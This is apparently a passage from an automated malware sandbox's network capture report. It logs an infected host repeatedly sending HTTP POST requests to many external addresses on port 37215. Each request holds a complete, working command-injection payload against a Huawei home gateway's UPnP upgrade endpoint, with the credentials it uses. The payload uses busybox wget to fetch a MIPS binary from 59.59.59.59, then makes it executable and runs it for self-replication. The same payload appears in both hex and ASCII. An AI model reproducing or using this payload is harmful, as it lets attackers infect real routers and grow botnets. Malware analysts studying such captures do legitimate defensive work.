39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2126192.168.2.155254041.17.29.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180810928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2127192.168.2.154090441.161.206.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180814028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2128192.168.2.1533886157.67.254.15937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180855989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2129192.168.2.1545656197.70.83.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.182816982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2130192.168.2.153434296.209.33.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.185148954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2131192.168.2.1555126197.206.232.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.185169935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2132192.168.2.1538392142.99.81.25037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.185405970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2133192.168.2.154240648.123.220.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.185466051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2134192.168.2.1539296197.56.129.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.185646057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:23.420906067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:23.864895105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
